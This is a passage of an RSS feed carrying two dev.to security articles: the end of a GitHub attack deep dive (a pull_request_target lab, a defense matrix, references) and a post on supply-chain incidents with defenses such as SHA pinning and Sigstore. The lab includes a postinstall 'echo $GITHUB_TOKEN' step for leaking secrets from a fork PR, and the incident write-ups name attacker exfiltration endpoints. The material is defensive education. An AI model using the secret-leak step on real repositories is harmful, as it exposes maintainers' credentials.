&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;ref&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.pull_request.head.ref }}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cat package.json | head&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm install&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Drop this into a test repo and &lt;strong&gt;open a PR from a fork&lt;/strong&gt;. Stick &lt;code&gt;"scripts": { "postinstall": "echo $GITHUB_TOKEN" }&lt;/code&gt; into the fork's &lt;code&gt;package.json&lt;/code&gt; and the target repo's secrets leak into the job log (for testing the token will appear masked, so you can confirm the behavior without real damage).&lt;/p&gt;

&lt;p&gt;These four bundled into a single &lt;code&gt;run.sh&lt;/code&gt; would fit the existing hands-on style at &lt;code&gt;articles/assets/github-hacking-deep-dive/run.sh&lt;/code&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Defense matrix
&lt;/h2&gt;

&lt;p&gt;Last, here is the attacks-and-defenses summary on a single page. &lt;strong&gt;No single control covers everything&lt;/strong&gt;: layer them.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack&lt;/th&gt;
&lt;th&gt;Primary defense&lt;/th&gt;
&lt;th&gt;Secondary defense&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Tag rewrite&lt;/td&gt;
&lt;td&gt;commit SHA pinning&lt;/td&gt;
&lt;td&gt;Sigstore / SLSA Provenance, Immutable Releases&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Author spoofing&lt;/td&gt;
&lt;td&gt;commit signing (&lt;code&gt;-S&lt;/code&gt;) + key registered on GitHub&lt;/td&gt;
&lt;td&gt;enable vigilant mode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SHA-1 collision&lt;/td&gt;
&lt;td&gt;GitHub.com collision detection&lt;/td&gt;
&lt;td&gt;migrate to a SHA-256 repo (long-term)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Submodule RCE&lt;/td&gt;
&lt;td&gt;upgrade to a patched git&lt;/td&gt;
&lt;td&gt;don't &lt;code&gt;--recursive&lt;/code&gt; clone repos you don't trust&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RepoJacking&lt;/td&gt;
&lt;td&gt;pin dependencies to commit SHA&lt;/td&gt;
&lt;td&gt;dependency proxy / vendor&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CFOR&lt;/td&gt;
&lt;td&gt;rotate assuming the secret has leaked&lt;/td&gt;
&lt;td&gt;secret scanning push protection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dangling commits&lt;/td&gt;
&lt;td&gt;run gitleaks / trufflehog before push&lt;/td&gt;
&lt;td&gt;bake rotation into your operational playbook&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pwn Request&lt;/td&gt;
&lt;td&gt;don't checkout PR HEAD under &lt;code&gt;pull_request_target&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;gate execution to trusted users&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Script Injection&lt;/td&gt;
&lt;td&gt;pass via environment variables&lt;/td&gt;
&lt;td&gt;actionlint / Semgrep in CI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cache Poisoning&lt;/td&gt;
&lt;td&gt;review pushes to main&lt;/td&gt;
&lt;td&gt;include commit SHA in cache key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Self-hosted runner&lt;/td&gt;
&lt;td&gt;don't use them in public repos&lt;/td&gt;
&lt;td&gt;ephemeral runners&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Left column (primary) is &lt;strong&gt;what directly counters that attack vector&lt;/strong&gt;; right column (secondary) is &lt;strong&gt;the fallback when the primary fails&lt;/strong&gt;. Sigstore / SLSA Provenance / Immutable Releases / gitsign show up on both columns repeatedly, which is the giveaway that they pull multiple layers up at once.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrap-up
&lt;/h2&gt;

&lt;p&gt;Git was designed as a distributed VCS where "consensus is taken after the fact". GitHub stacked SaaS conveniences on top of that, and Actions glued a CI execution environment to secrets. Each layer is reasonable in isolation, but &lt;strong&gt;the trust boundaries do not line up&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The git protocol &lt;strong&gt;does not verify authors&lt;/strong&gt; (Layer 1.2)&lt;/li&gt;
&lt;li&gt;GitHub &lt;strong&gt;does not actually delete deleted repos&lt;/strong&gt; (Layer 2.2)&lt;/li&gt;
&lt;li&gt;Actions &lt;strong&gt;gives outside PRs access to secrets&lt;/strong&gt; (Layer 3.2)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These three were designed by separate teams in separate contexts, but &lt;strong&gt;attackers chain across layers&lt;/strong&gt;. The fact that tj-actions and Trivy got burned twice in a year by the same playbook is not coincidence; it is the seam between trust boundaries being wide.&lt;/p&gt;

&lt;p&gt;Defenses also span layers. SHA pinning alone is not enough, and commit signing alone is not enough. Sigstore + SLSA Provenance + Immutable Releases + ephemeral runners. Only with all of those in place do you start to &lt;strong&gt;prevent the third instance of the same playbook&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Next time you read GitHub's official release notes, ask which trust gap each new feature fills. Immutable Releases addresses Layer 1.1, push protection addresses Layer 2.3, the stricter &lt;code&gt;permissions:&lt;/code&gt; defaults address Layer 3 in general. Conversely, every new feature opens new gaps (the 10 GB eviction change accelerated Cacheract, for example).&lt;/p&gt;

&lt;p&gt;Most of the toolkit for hacking git and GitHub fits in &lt;strong&gt;a few command-line one-liners&lt;/strong&gt;. Because attack is easy, defense has to be in layers.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066" rel="noopener noreferrer"&gt;GitHub Action tj-actions/changed-files supply chain attack | Wiz Blog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://thehackernews.com/2026/03/trivy-security-scanner-github-actions.html" rel="noopener noreferrer"&gt;Trivy Security Scanner GitHub Actions Breached, 75 Tags Hijacked | The Hacker News&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.crowdstrike.com/en-us/blog/from-scanner-to-stealer-inside-the-trivy-action-supply-chain-compromise/" rel="noopener noreferrer"&gt;From Scanner to Stealer: Inside the trivy-action Supply Chain Compromise | CrowdStrike&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.gruntwork.io/blog/how-to-spoof-any-user-on-github-and-what-to-do-to-prevent-it" rel="noopener noreferrer"&gt;How to Spoof Any User on Github | Gruntwork&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://arxiv.org/html/2504.19215v1" rel="noopener noreferrer"&gt;On the Prevalence and Usage of Commit Signing on GitHub (2025)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.blog/news-insights/company-news/sha-1-collision-detection-on-github-com/" rel="noopener noreferrer"&gt;SHA-1 collision detection on GitHub.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384" rel="noopener noreferrer"&gt;CVE-2025-48384: Breaking Git with a carriage return&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://kondukto.io/blog/git-scm-affected-by-cve-2024-32002" rel="noopener noreferrer"&gt;CVE-2024-32002 git submodule symlink RCE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://checkmarx.com/blog/persistent-threat-new-exploit-puts-thousands-of-github-repositories-and-millions-of-users-at-risk/" rel="noopener noreferrer"&gt;GitHub RepoJacking via race condition | Checkmarx&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github" rel="noopener noreferrer"&gt;Anyone can Access Deleted and Private Repository Data on GitHub | Truffle Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://trufflesecurity.com/blog/guest-post-how-i-scanned-all-of-github-s-oops-commits-for-leaked-secrets" rel="noopener noreferrer"&gt;Force Push Scanner | Truffle Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://securitylab.github.com/resources/github-actions-preventing-pwn-requests/" rel="noopener noreferrer"&gt;Keeping your GitHub Actions secure: Pwn Requests | GitHub Security Lab&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://snyk.io/blog/ultralytics-ai-pwn-request-supply-chain-attack/" rel="noopener noreferrer"&gt;Ultralytics AI Pwn Request Supply Chain Attack | Snyk&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/" rel="noopener noreferrer"&gt;The Monsters in Your Build Cache: GitHub Actions Cache Poisoning | Adnan Khan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.sysdig.com/blog/how-threat-actors-are-using-self-hosted-github-actions-runners-as-backdoors" rel="noopener noreferrer"&gt;How threat actors are using self-hosted GitHub Actions runners as backdoors | Sysdig&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>github</category>
      <category>git</category>
      <category>supplychain</category>
    </item>
    <item>
      <title>I built chainscope: reading supply chain attacks across 6 surfaces, one slide at a time</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Wed, 29 Apr 2026 15:05:15 +0000</pubDate>
      <link>https://dev.to/kanywst/i-built-chainscope-reading-supply-chain-attacks-across-6-surfaces-one-slide-at-a-time-28mc</link>
      <guid>https://dev.to/kanywst/i-built-chainscope-reading-supply-chain-attacks-across-6-surfaces-one-slide-at-a-time-28mc</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;On 2025-03-14, the GitHub Action &lt;code&gt;tj-actions/changed-files&lt;/code&gt; was hijacked. CVE-2025-30066. The blast radius: 23,000 repositories, 15 hours.&lt;/p&gt;

&lt;p&gt;When a workflow says &lt;code&gt;uses: tj-actions/changed-files@v44&lt;/code&gt;, that &lt;code&gt;v44&lt;/code&gt; is a &lt;strong&gt;tag&lt;/strong&gt;. A tag is just a label pointing at a commit SHA, and on git, &lt;strong&gt;tags are rewritable&lt;/strong&gt;. With the maintainer's GitHub Token in hand, the attacker &lt;strong&gt;rewrote every tag from &lt;code&gt;v1&lt;/code&gt; through &lt;code&gt;v45&lt;/code&gt;&lt;/strong&gt; to point at a single malicious commit.&lt;/p&gt;

&lt;p&gt;Any CI that wrote &lt;code&gt;uses: ...@v44&lt;/code&gt; started running the malicious Action on its very next run, without changing anything on its side. The Action scraped AWS / GitHub / PyPI tokens out of the runner's memory and dumped them, base64-encoded, into the &lt;strong&gt;public job log&lt;/strong&gt;. Public GitHub Actions logs are world-readable, so the leak was complete right there.&lt;/p&gt;

&lt;p&gt;The headlines say "another supply chain attack". But put this next to the 2024 xz-utils backdoor and the spot that got hit, and the defense that actually works, are nothing alike.&lt;/p&gt;

&lt;p&gt;I tried to fit that difference into one diagram, failed, and ended up making slides. That became &lt;a href="https://0-draft.github.io/chainscope" rel="noopener noreferrer"&gt;&lt;strong&gt;chainscope&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6dsu76nktml4obecgjs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6dsu76nktml4obecgjs.png" alt="screenshot" width="800" height="430"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Background
&lt;/h2&gt;

&lt;p&gt;A few terms up front make the rest go faster.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Mutable tag&lt;/strong&gt;: a git tag is a label pointing at a commit SHA, and it can be moved later. The &lt;code&gt;v1&lt;/code&gt; in &lt;code&gt;uses: org/action@v1&lt;/code&gt; resolves to &lt;strong&gt;whatever SHA it points at right now&lt;/strong&gt; when CI runs. A pinned commit SHA (&lt;code&gt;@a284dc1aef...&lt;/code&gt;) is immutable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;postinstall script&lt;/strong&gt;: an npm package can run any shell command listed in &lt;code&gt;package.json&lt;/code&gt;'s &lt;code&gt;scripts.postinstall&lt;/code&gt;, fired immediately after &lt;code&gt;npm install&lt;/code&gt;. Lockfile hashes pin the tarball, but they say nothing about what postinstall does.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OIDC Trusted Publisher&lt;/strong&gt;: PyPI / npm gating publishing on a GitHub Actions workflow's execution identity (OIDC token). &lt;strong&gt;Stealing the maintainer's password gets you nothing if you can't publish from their workflow.&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sigstore&lt;/strong&gt;: signature verification for published artifacts, backed by OIDC identity and a transparency log (Rekor). Used via &lt;code&gt;cosign verify-blob&lt;/code&gt; and friends.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Admission Controller (e.g. Kyverno)&lt;/strong&gt;: enforces policy at the moment a container image lands on a Kubernetes cluster. "Refuse to start unless the expected signature is present" is exactly its job.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  The software supply chain is not a single line
&lt;/h2&gt;

&lt;p&gt;From source to production, an artifact passes through 6 stages.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi34up90paoewcsbb9sm8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi34up90paoewcsbb9sm8.png" alt="software-supply-chain" width="800" height="105"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Colors are lifted straight from each stage's flagship tool: &lt;code&gt;source = #f05032&lt;/code&gt; (Git orange), &lt;code&gt;deps = #cb3837&lt;/code&gt; (npm red), &lt;code&gt;build = #2088ff&lt;/code&gt; (GitHub Actions blue), &lt;code&gt;consume = #326ce5&lt;/code&gt; (Kubernetes blue). Idea being, the color alone tells you which stage you're looking at.&lt;/p&gt;

&lt;p&gt;Attackers only need to own one of the six. Defenders need a separate layer at every one, or they lose somewhere. chainscope calls them "surfaces".&lt;/p&gt;




&lt;h2&gt;
  
  
  6 incidents
&lt;/h2&gt;

&lt;p&gt;One real incident per stage. Goal: next time the news breaks, you can immediately shelve it as "oh, that's a 03 one".&lt;/p&gt;

&lt;h3&gt;
  
  
  01 SOURCE: xz-utils backdoor (2024-03-29)
&lt;/h3&gt;

&lt;p&gt;CVE-2024-3094, CVSS 10.0. "Jia Tan" spent 2 years working their way into a maintainer slot on xz and, in the end, planted a backdoor &lt;strong&gt;only in the release tarballs, never in the Git tree&lt;/strong&gt;. The trick: hiding the payload inside test fixtures so the sshd backdoor wired itself in only at build time. Andres Freund (a PostgreSQL core dev) caught it by accident, from &lt;code&gt;valgrind&lt;/code&gt; noise.&lt;/p&gt;

&lt;p&gt;What works here is &lt;strong&gt;commit signing plus reproducible builds, together&lt;/strong&gt;. &lt;code&gt;gitsign&lt;/code&gt;-style commit signing pins commits to a real OIDC identity. Reproducible builds let you check bit-for-bit equality between the tarball built from the Git tree and the official release tarball. Without the latter, the "plant it only in the tarball" trick from xz walks right through.&lt;/p&gt;

&lt;h3&gt;
  
  
  02 DEPS: Shai-Hulud npm worm (2025-09-14)
&lt;/h3&gt;

&lt;p&gt;The first &lt;strong&gt;self-propagating worm&lt;/strong&gt; on a public registry. The attacker phished npm maintainers with mail dressed up as "npm security alert" and grabbed their credentials. With the stolen npm tokens, they pushed malicious packages.&lt;/p&gt;

&lt;p&gt;When a dev ran &lt;code&gt;npm install&lt;/code&gt; and pulled one of those in, &lt;strong&gt;postinstall&lt;/strong&gt; fired: it lifted local &lt;code&gt;NPM_TOKEN&lt;/code&gt; / &lt;code&gt;GH_TOKEN&lt;/code&gt; / &lt;code&gt;~/.pypirc&lt;/code&gt;, then &lt;strong&gt;injected the same malicious code into every package that dev owned and republished the lot&lt;/strong&gt;. Every victim launched the next wave. No human in the loop, just lateral spread. By 2025-09-16 over 180 packages had been hit. On 2025-11-24 Shai-Hulud 2.0 turned up, dragging in nearly 800 packages (20 million weekly downloads combined).&lt;/p&gt;

&lt;p&gt;What works: &lt;strong&gt;a hash-pinned lockfile plus SBOM diffing&lt;/strong&gt;. Use &lt;code&gt;npm ci&lt;/code&gt; (which fails when hashes don't match the lockfile) instead of &lt;code&gt;npm install&lt;/code&gt; (which re-resolves), emit an SBOM every build, diff against the previous one. Code that's been silently swapped shows up as something foreign, not as an update. Turning postinstall off with &lt;code&gt;--ignore-scripts&lt;/code&gt; is also worth wiring in as the CI default.&lt;/p&gt;

&lt;h3&gt;
  
  
  03 BUILD: tj-actions/changed-files (2025-03-14)
&lt;/h3&gt;

&lt;p&gt;The one from the intro. The &lt;strong&gt;tag&lt;/strong&gt; in &lt;code&gt;uses: tj-actions/changed-files@v44&lt;/code&gt; got moved to point at a malicious commit. 23,000 repos ran it for 15 hours, and CI secrets were base64-spilled into public logs. CVE-2025-30066.&lt;/p&gt;

&lt;p&gt;What works: &lt;strong&gt;pin by commit SHA, plus SLSA Provenance&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tj-actions/changed-files@a284dc1aef0bee7&lt;/span&gt;  &lt;span class="c1"&gt;# full SHA, not @v44&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A commit SHA can't move, so "quietly retag" attacks don't land. Layer SLSA Provenance on top and you get a signed attestation of &lt;strong&gt;which commit, which builder, which inputs, which environment&lt;/strong&gt; produced the artifact. Consumers verify it with &lt;code&gt;slsa-verifier verify-artifact&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  04 PUBLISH: TeamPCP / LiteLLM (2026-03-24)
&lt;/h3&gt;

&lt;p&gt;The PyPI package for LiteLLM (an LLM proxy doing 95 million downloads a month) got compromised. The path in is the clever part. The crew, TeamPCP, &lt;strong&gt;had already compromised Trivy&lt;/strong&gt; (the vulnerability scanner) earlier on, and LiteLLM's CI pulled poisoned Trivy in through &lt;code&gt;apt install trivy&lt;/code&gt; (no version pin). The poisoned Trivy then exfiltrated the runner's &lt;code&gt;PYPI_PUBLISH&lt;/code&gt; token.&lt;/p&gt;

&lt;p&gt;With the stolen token they pushed &lt;code&gt;litellm 1.82.7&lt;/code&gt; (10:39 UTC) and &lt;code&gt;1.82.8&lt;/code&gt; (10:52 UTC). Those sat on PyPI for about 40 minutes before quarantine. Payload: credential stealer, lateral movement into Kubernetes, persistent backdoor. Stolen data POSTed to &lt;code&gt;models.litellm.cloud&lt;/code&gt; (not the real domain).&lt;/p&gt;

&lt;p&gt;What works: &lt;strong&gt;Sigstore plus Trusted Publisher (OIDC)&lt;/strong&gt;. Signing and publishing are bound to the GitHub Actions workflow run ID, so &lt;strong&gt;a stolen token can't publish from anywhere else&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;cosign verify-blob litellm-1.82.8.tar.gz &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="s1"&gt;'https://github.com/BerriAI/litellm/.github/workflows/publish.yml@.*'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; https://token.actions.githubusercontent.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And: &lt;strong&gt;pin every tool CI uses by SHA or version&lt;/strong&gt;. Just refusing to run bare &lt;code&gt;apt install foo&lt;/code&gt; would have shut the entry point for this one.&lt;/p&gt;

&lt;h3&gt;
  
  
  05 DISTRIBUTE: pgserve / CanisterSprawl (2026-04-21)
&lt;/h3&gt;

&lt;p&gt;The maintainer account for &lt;code&gt;pgserve&lt;/code&gt; (a PostgreSQL helper for Node.js) got compromised. &lt;strong&gt;Not typosquatting: the real, official package&lt;/strong&gt; was shipped as a malicious version (StepSecurity tracks it as "CanisterSprawl"). First malicious version at 22:14 UTC, two more on the same day.&lt;/p&gt;

&lt;p&gt;The postinstall hook, on every &lt;code&gt;npm install&lt;/code&gt;, hoovered up everything in reach: &lt;code&gt;NPM_TOKEN&lt;/code&gt; / &lt;code&gt;GH_TOKEN&lt;/code&gt; / SSH keys / cloud credentials / Kubernetes config / Docker config, plus LLM-platform keys. It also &lt;strong&gt;republished every package the victim could publish to, spreading itself&lt;/strong&gt; (same pattern as Shai-Hulud). If it landed Python-side credentials, a &lt;code&gt;.pth&lt;/code&gt;-based payload pivoted onto PyPI as well. Unusual detail: alongside the regular webhook, stolen data was POSTed to an ICP (Internet Computer) canister, &lt;code&gt;cjn37-uyaaa-aaaac-qgnva-cai&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;What works: &lt;strong&gt;registry-side Sigstore Attestation verification&lt;/strong&gt; plus &lt;strong&gt;postinstall off&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;npm &lt;span class="nb"&gt;install &lt;/span&gt;pgserve &lt;span class="nt"&gt;--ignore-scripts&lt;/span&gt;
&lt;span class="nv"&gt;$ &lt;/span&gt;npm audit signatures
  -&amp;gt; attestation issuer &lt;span class="o"&gt;!=&lt;/span&gt; expected workflow
  -&amp;gt; &lt;span class="nb"&gt;install &lt;/span&gt;rejected
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since 2024, npm has been distributing Sigstore Attestations through the registry, and &lt;code&gt;npm audit signatures&lt;/code&gt; checks at install time whether the package was signed by the expected GitHub workflow ID. With Trusted Publisher mandated, a stolen maintainer password alone doesn't let you publish. &lt;code&gt;--ignore-scripts&lt;/code&gt; (postinstall off) sits on the &lt;strong&gt;damage-after-entry&lt;/strong&gt; side, and is worth making the CI default.&lt;/p&gt;

&lt;h3&gt;
  
  
  06 CONSUME: SUNSPOT / SolarWinds (2020-12-13)
&lt;/h3&gt;

&lt;p&gt;Older, but it anchors the shape of the problem. Attackers got onto the &lt;strong&gt;build server&lt;/strong&gt; for SolarWinds Orion and planted a tool (SUNSPOT) that swapped sources only at the moment of build. The resulting binary went through the legitimate pipeline, signed with the legitimate key, and shipped via auto-update to thousands of customers. The payload was the SUNBURST malware. FireEye disclosed on 2020-12-13.&lt;/p&gt;

&lt;p&gt;This happens even with a perfectly legitimate signature attached. What works: &lt;strong&gt;cosign verify plus admission policy plus VEX&lt;/strong&gt;. Not "signed by someone somewhere" but "&lt;strong&gt;signed by the expected OIDC subject (e.g. our specific workflow)&lt;/strong&gt;", enforced at admission time by a Kubernetes admission controller (Kyverno or similar).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kyverno.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClusterPolicy&lt;/span&gt;
&lt;span class="s"&gt;spec.rules[0].verifyImages&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;imageReferences&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;*'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
  &lt;span class="s"&gt;attestors[0].entries[0].keyless.subject&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
    &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://github.com/me/repo/.github/workflows/ci.yml@*'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  A single mapping table
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Stage&lt;/th&gt;
&lt;th&gt;Incident&lt;/th&gt;
&lt;th&gt;Effective defense&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;01&lt;/td&gt;
&lt;td&gt;source&lt;/td&gt;
&lt;td&gt;xz-utils backdoor&lt;/td&gt;
&lt;td&gt;gitsign + reproducible builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;02&lt;/td&gt;
&lt;td&gt;deps&lt;/td&gt;
&lt;td&gt;Shai-Hulud worm&lt;/td&gt;
&lt;td&gt;npm ci + SBOM diff + --ignore-scripts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;03&lt;/td&gt;
&lt;td&gt;build&lt;/td&gt;
&lt;td&gt;tj-actions/changed-files&lt;/td&gt;
&lt;td&gt;SHA pin + SLSA Provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;04&lt;/td&gt;
&lt;td&gt;publish&lt;/td&gt;
&lt;td&gt;TeamPCP / LiteLLM&lt;/td&gt;
&lt;td&gt;Sigstore + Trusted Publisher (OIDC)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;05&lt;/td&gt;
&lt;td&gt;distribute&lt;/td&gt;
&lt;td&gt;pgserve / CanisterSprawl&lt;/td&gt;
&lt;td&gt;npm audit signatures + --ignore-scripts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;06&lt;/td&gt;
&lt;td&gt;consume&lt;/td&gt;
&lt;td&gt;SUNSPOT / SolarWinds&lt;/td&gt;
&lt;td&gt;cosign + Kyverno admission policy&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Attackers win by breaking any one of the six. Defenders need a separate layer at every one, or they lose somewhere.&lt;/p&gt;




&lt;h2&gt;
  
  
  Try it
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://0-draft.github.io/chainscope" rel="noopener noreferrer"&gt;https://0-draft.github.io/chainscope&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;space&lt;/code&gt; to advance, &lt;code&gt;←&lt;/code&gt; to go back, &lt;code&gt;r&lt;/code&gt; to restart. 22 slides, one lap in 5 minutes.&lt;/p&gt;

